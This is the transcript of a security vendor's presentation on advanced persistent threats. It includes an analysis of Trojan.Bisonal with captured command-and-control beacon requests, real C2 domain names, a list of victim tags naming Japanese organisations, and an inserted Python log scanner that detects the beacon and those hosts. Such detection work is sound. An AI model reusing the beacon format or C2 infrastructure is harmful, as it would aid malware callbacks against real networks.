Stopping Next-Gen Threats

Presentation Transcript

  1. Stopping Next-Gen Threats – Dan Walters, Sr. Systems Engineer Mgr.

  2. "We're moving towards a world where every attack is effectively zero-day… having a signatured piece of malware, that shouldn't be the foundation on which any security model works." - Chris Young, GVP Cisco Security, Tech Week Europe, September 28th 2012

  3. High Profile APT Attacks Are Increasingly Common

  4. The Attack Lifecycle – Multiple Stages (diagram)
      Stage 1: Exploitation of system (from a compromised Web server or Web 2.0 site)
      Stage 2: Malware binary download
      Stage 3: Callbacks and control established (to the Callback Server)
      Other diagram labels: File Share 1, File Share 2, IPS, DMZ

  5. Crimeware == for the $

  6. Advanced Persistent Threat == Human

  7. This is Alex == FireEye Research

  8. The Usual Suspects

  9. Organized…Persistent…

  10. Reconnaissance made easy…

  11. The Exploit

  12. LaserMotive

  13. CEOs are targeted

  14. Could you stop this?

  15. The Callback

  16. Hidden in plain view…

  17. Blog Post?

  18. RSS Feed?

  19. We’re Only Human

  20. HR make for easy targets

  21. Just doing my job…

  22. NATO is a frequent spearphish target

  23. Global Unrest

  24. Whose Oil is it?

  25. The curious case of Trojan.Bisonal
      • Targets 100% Japanese organizations
      • Delivered via weaponized doc/xls files
      • Embeds the target name into the command and control traffic

  26. Custom “Flag” and c2 domain

      GET /j/news.asp?id=* HTTP/1.1
      User-Agent: flag:khihost:BusinessIP:10.0.0.43 OS:XPSP3 vm:�� proxy:��
      Host: online.cleansite.us
      Cache-Control: no-cache

      GET /a.asp?id=* HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
      Host: khi.acmetoy.com
      Connection: Keep-Alive

  27. Other “Flag”s seen
      • flag:410maff <-- Ministry of Agriculture, Forestry, and Fisheries
      • flag:1223
      • Flag:712mhi <-- Mitsubishi Heavy Industries
      • Flag:727x
      • Flag:8080
      • Flag:84d
      • flag:boat
      • Flag:d2
      • Flag:dick
      • flag:jsexe
      • flag:jyt
      • Flag:m615
      • flag:toray
      • Flag:MARK 1
      • flag:nec01 <-- NEC Corporation
      • Flag:qqq
      • flag:nids <-- National Institute for Defense Studies (nids.go.jp)
      • flag:nsc516 <-- Nippon Steel Corp
      • flag:ihi <-- IHI Corp
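The beacon format on slides 26 and 27 gives a defender two things to hunt for: a User-Agent that starts with a "flag:" victim tag followed by host/IP/OS fields, and the two C2 host names quoted in the requests. The following is an added example, not code from the presentation or from FireEye: it scans a constructed proxy log (the timestamp/client/method/URL/host/"user-agent" layout, the log line format and all sample lines are assumptions for illustration) for both indicators, extracts the flag and victim fields from matching beacons, and labels the flag with the organisation the slides attribute to it where one is given. The regex accepts the fields with or without separating spaces, because the transcript shows them run together.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Beacon User-Agent layout from slide 26: "flag:<tag> host:<name> IP:<addr> OS:<ver> ...".
# The transcript shows the fields run together ("flag:khihost:BusinessIP:..."),
# so the separators are optional whitespace rather than required spaces.
BISONAL_UA = re.compile(
    r"^flag:(?P<flag>.+?)\s*host:(?P<host>.+?)\s*IP:(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
    r"\s*OS:(?P<os>\S+)",
    re.IGNORECASE,
)

# Flags attributed to an organisation on slide 27 (unattributed flags are left out).
KNOWN_FLAGS: Dict[str, str] = {
    "410maff": "Ministry of Agriculture, Forestry and Fisheries",
    "712mhi": "Mitsubishi Heavy Industries",
    "nec01": "NEC Corporation",
    "nids": "National Institute for Defense Studies",
    "nsc516": "Nippon Steel Corp",
    "ihi": "IHI Corp",
}

# C2 host names quoted in the requests on slide 26.
C2_HOSTS = {"online.cleansite.us", "khi.acmetoy.com"}


@dataclass
class Hit:
    line_no: int
    reason: str
    flag: Optional[str] = None
    victim_host: Optional[str] = None
    victim_ip: Optional[str] = None
    c2_host: Optional[str] = None
    attributed_org: Optional[str] = None


def parse_log_line(line: str) -> dict:
    """Split an assumed proxy log line:
    '<timestamp> <client_ip> <method> <url> <host> "<user-agent>"'."""
    m = re.match(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "(.*)"$', line)
    if not m:
        return {}
    ts, client, method, url, host, ua = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url, "host": host, "ua": ua}


def inspect(line_no: int, fields: dict) -> Optional[Hit]:
    """Flag a line if its User-Agent has the Bisonal beacon layout, or failing
    that if the destination host is one of the quoted C2 domains."""
    ua = fields.get("ua", "")
    host = fields.get("host", "").lower()
    m = BISONAL_UA.match(ua)
    if m:
        flag = m.group("flag").strip()
        return Hit(line_no, "bisonal-beacon-ua", flag=flag,
                   victim_host=m.group("host").strip(), victim_ip=m.group("ip"),
                   c2_host=host, attributed_org=KNOWN_FLAGS.get(flag.lower()))
    if host in C2_HOSTS:
        return Hit(line_no, "known-c2-host", c2_host=host)
    return None


def scan(log_text: str) -> List[Hit]:
    hits = []
    for n, raw in enumerate(log_text.splitlines(), 1):
        fields = parse_log_line(raw)
        if fields:
            hit = inspect(n, fields)
            if hit:
                hits.append(hit)
    return hits


# Constructed sample log. Lines 1-2 mirror the two requests on slide 26 (the
# unreadable vm:/proxy: values are replaced by "?"); line 3 is benign browsing;
# line 4 is a constructed beacon using a slide-27 flag with spaced fields.
SAMPLE_LOG = """\
2012-09-28T10:01:02Z 10.0.0.43 GET /j/news.asp?id=* online.cleansite.us "flag:khihost:BusinessIP:10.0.0.43 OS:XPSP3 vm:? proxy:?"
2012-09-28T10:01:05Z 10.0.0.43 GET /a.asp?id=* khi.acmetoy.com "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
2012-09-28T10:02:11Z 10.0.0.77 GET /index.html www.example.org "Mozilla/5.0 (Windows NT 6.1) Firefox/15.0"
2012-09-28T10:03:40Z 10.0.0.91 GET /n.asp?id=* c2.example.invalid "flag:712mhi host:DESK-12 IP:10.0.0.91 OS:XPSP3 vm:no proxy:no"
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h)
```

The second request on slide 26 carries an ordinary Internet Explorer User-Agent, which is why the scan also keys on the destination host: the beacon signature alone would miss that follow-up request.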

  28. China is not the only threat

  29. Multi-Protocol, Real-Time VX Engine
      PHASE 1: Multi-Protocol Object Capture
      • Web MPS: Aggressive Capture; Web Object Filter
      • E-mail MPS: Email Attachments; URL Analysis
      PHASE 2: Virtual Execution Environments (mapped to target OS and applications)
      • Dynamic, real-time analysis: Exploit detection; Malware binary analysis; Cross-matrix of OS/apps
      • Output: Originating URL; Subsequent URLs; OS modification report; C&C protocol descriptors

  30. Thank You! FireEye - Modern Malware Protection System